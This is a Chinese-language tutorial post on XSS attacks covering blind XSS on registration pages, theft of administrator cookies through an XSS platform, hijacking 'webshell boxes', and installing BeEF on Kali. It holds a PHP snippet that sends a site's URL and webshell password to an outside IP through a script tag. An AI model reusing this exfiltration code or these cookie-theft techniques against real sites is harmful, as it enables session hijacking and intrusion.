WEB漏洞-XSS跨站之订单及Shell箱子反杀记
XSS平台
xss盲打测试
搭建测试环境可能因为版本问题没有成功,改用自己的测试代码
在注册页面尝试xss注入,注册页面过滤不严格通常都可以尝试xss注入漏洞
随便找个xss平台注册进行测试,实际上这个平台在github上有源码,也可以自己进行搭建
获得注入语句后进行测试
管理员账号进行登录时,发现了注入的脚本,再返回xss平台查看
或得到了cookie,也可以利用该cookie在没有过期之前进入到该网站的后台
webshell箱子反杀
既然有这样的xss平台,就会有利用平台的思路,在获得webshell的过程中,难免使用别人写好的工具,其中就会存在后门,把攻击成功的webshell信息汇总到一个服务器,这个东西就叫做webshell箱子,如果这个箱子过滤不严格,就会存在xss注入漏洞,利用这个漏洞就可以获得cookie,进入这个箱子
大马存在发送webshell信息到盒子
摸清这个规律后,如果链接参数过滤不严格,就可以构造xss语句进行攻击,先测试一次,摸清规律
// $_SERVER['HTTP_HOST']获取当前域名
// $_SERVER['PHP_SELF']当前PHP文件相对于网站根目录的位置地址
<?php
$password = 'admin';
$url = $_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
echo "<script src='http://121.40.173.182/api.asp?url=$url&pass=$password&id=1'>";
?>
假设访问了上述代码为一个大马且存在向webshell发送信息,查看后台发现链接和密码显示在后台,利用该链接,进行注入
xss箱子查看(发现新的PHP脚本入账,XSS一般盗取管理员密码(cookie)和管理员当前的浏览页面的地址),这类后门的后门,一般都会通过加密来掩饰地址,并且命名为:过狗,秒杀一切等等,一般在webshell后门下载等等。特点:会跳转到其它网站传递信息
- 可以尝试在链接中注入xss,然后推送该信息到webshell箱子,然后获取管理员的cookie
beef
使用的2021的kali没有beef需要自己安装,确保安装成功需要更换apt源,注释掉原来的源,推荐用aliyun的源
#vim /etc/apt/sources.list
# See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
#deb http://http.kali.org/kali kali-rolling main contrib non-free
# Additional line for source packages
# deb-src http://http.kali.org/kali kali-rolling main contrib non-free
#中科大
#deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
#deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
#deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
安装beef-xss
apt-get install beef-xss -y
安装完成后需要修改默认的用户名和密码,否则会启动失败
vi /etc/beef-xss/config.yaml
修改配置文件找到用户名和密码全部修改
systemctl start beef-xss
启动beef,也可以使用beef-xss
命令
访问
http://192.168.50.22:3000/ui/authentication
尝试注入后查看beef后台
只要不关闭页面,就可以一直进行攻击
模拟flash更新引导攻击
自行搭建xss平台
搭建xss平台需要1台外网服务器即可
0 条评论